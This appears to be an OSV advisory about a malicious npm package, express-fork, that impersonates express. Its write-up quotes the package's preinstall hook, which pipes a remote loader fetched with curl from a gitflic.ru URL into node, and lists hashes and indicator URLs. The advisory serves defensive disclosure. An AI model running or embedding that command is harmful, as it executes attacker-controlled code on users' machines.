MAL-2026-17490

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-fork/MAL-2026-17490.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17490
Published
2026-10-03T05:14:11Z
Modified
2026-10-05T23:00:07Z
Summary
Malicious code in express-fork (npm)
Details

express-fork@5.2.2 impersonates express (it copies express's package metadata, including the description "Fast, unopinionated, minimalist web framework" and author TJ Holowaychuk) and adds a preinstall script that runs on npm install and pipes a remotely hosted loader into node: curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node. This runs attacker-controlled JavaScript with the installing user's privileges. The npm account cleancomforter published express-fork and 8 similar packages on 2026-10-03 between 05:05 and 05:25 UTC, all with the same preinstall script.


-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (174daf2d7b9b396bb40a2ad347597eb7d1e829c46e4568e9700302e8aaceee3d)

express-fork@5.2.2 is a typosquat of the express package. Its package.json metadata (description, author, repository, keywords) is copied verbatim from express, while package.json line 98 defines a preinstall lifecycle script that runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/...?file=node.js | node. On every npm install, the hook fetches an unpinned JavaScript file from a third-party gitflic.ru account unrelated to the Express publisher (via a web.archive.org wrapper) and pipes it directly to the Node interpreter, with no integrity or signature check. The fetched content executes with the privileges of the installing user and can perform arbitrary actions on the installer's machine, including credential theft, persistence, or further payload delivery. The impersonation of express is the lure that causes typo-based installs to trigger the remote-exec hook.

Database specific
{
    "iocs":  {
        "files":  [
            {
                "digests":  {
                    "sha256":  "3a9cf794b592e277f0ac94af4b9b43623e43a29b4d311febf47f888103a5da79"
                },
                "note":  "preinstall script pipes the web.archive.org copy of gitflic.ru hellscripter/install-scripts node.js into node (express-fork@5.2.2).",
                "paths":  [
                    "package.json"
                ],
                "source":  "PACKAGE_ARCHIVE"
            }
        ],
        "urls":  [
            "https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js",
            "https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js"
        ]
    },
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020874",
            "import_time":  "2026-10-04T23:16:29.77441419Z",
            "modified_time":  "2026-10-04T23:12:20Z",
            "sha256":  "174daf2d7b9b396bb40a2ad347597eb7d1e829c46e4568e9700302e8aaceee3d",
            "source":  "amazon-inspector",
            "versions":  [
                "5.2.2"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / express-fork

Package

Affected ranges

Affected versions

5.*
5.2.2

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    },
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "3a9cf794b592e277f0ac94af4b9b43623e43a29b4d311febf47f888103a5da79",
            "tlsh":  "0351bb21dc0e9c6326c5a6dd3c69a542612188078e41f81cf359539c8f8e56f71b9f7f"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "express-fork-5.2.2.tgz",
            "hashes":  {
                "sha1":  "ae133af8f04524751258ac0c8882dd2b6f438dc4",
                "sha512_sri":  "sha512-fb23mmuYvYpfCX0v0Wy9NR2Z723ktagZ8oh7Xk4ywAR74iLaQ93CEKAJd8CKM2k/AdKJndhdmvQ3uu5ovMrU/Q=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/express-fork/MAL-2026-17490.json"